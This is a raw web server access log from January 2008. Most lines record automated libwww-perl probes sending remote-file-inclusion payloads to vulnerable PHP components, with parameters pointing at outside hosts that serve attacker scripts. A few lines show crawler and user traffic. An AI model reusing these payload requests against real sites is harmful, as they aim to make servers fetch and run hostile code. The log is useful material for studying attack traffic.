206.123.115.125 - - [25/Jan/2008:08:07:51 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.123.115.125 - - [25/Jan/2008:08:07:51 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.10.64.90 - - [25/Jan/2008:08:08:04 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.10.64.90 - - [25/Jan/2008:08:08:06 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.10.64.90 - - [25/Jan/2008:08:08:06 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.10.64.90 - - [25/Jan/2008:08:09:09 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.179.212 - - [25/Jan/2008:08:11:11 -0800] "GET /minamijewelry/source_images/ HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:08:13:59 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:08:13:59 -0800] "GET //login.php?dir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:08:14:00 -0800] "GET /logs//login.php?dir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.77.94.81 - - [25/Jan/2008:08:14:52 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.113.226.82 - - [25/Jan/2008:08:14:53 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.77.94.81 - - [25/Jan/2008:08:14:53 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.77.94.81 - - [25/Jan/2008:08:14:53 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.77.94.81 - - [25/Jan/2008:08:14:54 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:08:15:33 -0800] "GET /logs/access.log//config.php?path_to_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:08:15:33 -0800] "GET //config.php?path_to_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:08:15:34 -0800] "GET /logs//config.php?path_to_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.50.50.4 - - [25/Jan/2008:08:16:39 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/renatas2/id21.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.50.50.4 - - [25/Jan/2008:08:16:39 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/renatas2/id21.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:08:16:52 -0800] "GET /logs/access_071228.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.90.136 - - [25/Jan/2008:08:17:50 -0800] "GET /logs/access_071230.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.90.136 - - [25/Jan/2008:08:17:50 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:08:18:09 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:08:18:10 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:08:18:11 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:08:18:12 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:08:18:24 -0800] "GET /logs/access_080106.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:08:18:24 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:08:18:24 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:08:18:46 -0800] "GET /logs/access_071228.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:08:18:51 -0800] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:08:18:52 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:08:18:52 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:08:18:55 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.216.11 - - [25/Jan/2008:08:19:00 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=%20http://www.begratrading.com/cache/sistem.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.6.25.72 - - [25/Jan/2008:08:22:27 -0800] "GET /megumi/Necklace/?N=D HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.50.50.4 - - [25/Jan/2008:08:22:53 -0800] "GET /logs/access_080112.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/renatas2/id21.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:08:23:39 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:08:23:39 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:08:23:39 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.146.140.130 - - [25/Jan/2008:08:24:21 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.146.140.130 - - [25/Jan/2008:08:24:22 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.230.148.86 - - [25/Jan/2008:08:24:27 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.localfood.or.kr/bbs/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [25/Jan/2008:08:24:28 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.localfood.or.kr/bbs/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [25/Jan/2008:08:24:28 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.localfood.or.kr/bbs/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.44.121.34 - - [25/Jan/2008:08:26:43 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.44.121.34 - - [25/Jan/2008:08:26:43 -0800] "GET /?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
209.44.121.34 - - [25/Jan/2008:08:26:44 -0800] "GET /logs/?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 200 31683 "-" "libwww-perl/5.79" "www.dmulk.com"
217.113.226.82 - - [25/Jan/2008:08:27:28 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.113.226.82 - - [25/Jan/2008:08:27:28 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.42.21.56 - - [25/Jan/2008:08:27:32 -0800] "GET /presto/ HTTP/1.1" 200 526 "http://home.earthlink.net/~infernofilecabinet2/XpSetupsF_J/JourneyPII_Setup.htm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.42.21.56 - - [25/Jan/2008:08:27:33 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.42.21.56 - - [25/Jan/2008:08:27:35 -0800] "GET / HTTP/1.1" 200 2962 "http://www.dmulk.com/presto/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:08:27:39 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.144.192 - - [25/Jan/2008:08:27:40 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_wmtgallery&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:08:27:40 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:08:27:40 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:08:27:41 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.42.21.56 - - [25/Jan/2008:08:27:45 -0800] "GET /presto/ HTTP/1.1" 200 526 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:08:29:07 -0800] "GET /logs/access_071228.log//config.php?path_to_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.113.226.82 - - [25/Jan/2008:08:29:30 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.216.11 - - [25/Jan/2008:08:30:14 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=%20http://www.begratrading.com/cache/sistem.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.193.216.11 - - [25/Jan/2008:08:30:19 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=%20http://www.begratrading.com/cache/sistem.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.193.216.11 - - [25/Jan/2008:08:30:20 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=%20http://www.begratrading.com/cache/sistem.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.54.46.178 - - [25/Jan/2008:08:31:25 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.46.178 - - [25/Jan/2008:08:31:25 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.46.178 - - [25/Jan/2008:08:31:26 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.206.72.201 - - [25/Jan/2008:08:31:31 -0800] "GET /logs/access_080101.log/index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [25/Jan/2008:08:31:31 -0800] "GET /logs/access_080101.log/index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [25/Jan/2008:08:31:31 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [25/Jan/2008:08:31:32 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [25/Jan/2008:08:31:32 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [25/Jan/2008:08:31:32 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:08:33:14 -0800] "GET /logs/access_080104.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.231 - - [25/Jan/2008:08:33:19 -0800] "GET /megumi/ HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:08:35:28 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:08:35:28 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:08:35:28 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
213.206.72.201 - - [25/Jan/2008:08:35:29 -0800] "GET /logs/access_080106.log/index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [25/Jan/2008:08:35:32 -0800] "GET /logs/access_080106.log/index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:08:36:16 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:08:36:16 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:08:36:16 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.19.219 - - [25/Jan/2008:08:36:36 -0800] "GET /megumi/?S=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.54.46.178 - - [25/Jan/2008:08:36:40 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:08:40:17 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.144.192 - - [25/Jan/2008:08:41:06 -0800] "GET /logs/access_071230.log/index.php?_REQUEST=&_REQUEST[option]=com_wmtgallery&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.144.192 - - [25/Jan/2008:08:41:07 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_wmtgallery&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:08:43:44 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:08:43:44 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:08:43:45 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:08:44:29 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:08:44:30 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:08:44:30 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:08:44:52 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
84.19.178.201 - - [25/Jan/2008:08:46:16 -0800] "GET //modules/vwar//convert/mvcw.php?step=1&vwar_root=http://www.abilon.nl/upload/robot.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
84.19.178.201 - - [25/Jan/2008:08:46:16 -0800] "GET /logs//modules/vwar//convert/mvcw.php?step=1&vwar_root=http://www.abilon.nl/upload/robot.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
207.58.141.110 - - [25/Jan/2008:08:47:14 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [25/Jan/2008:08:48:15 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.8.232.250 - warboard [25/Jan/2008:08:49:57 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=582 HTTP/1.1" 200 7606 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [25/Jan/2008:08:50:15 -0800] "POST /warboard/index.php?table_name=warboard_main&page=0&function=update&where_field=dataid&where_value=582 HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=582" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
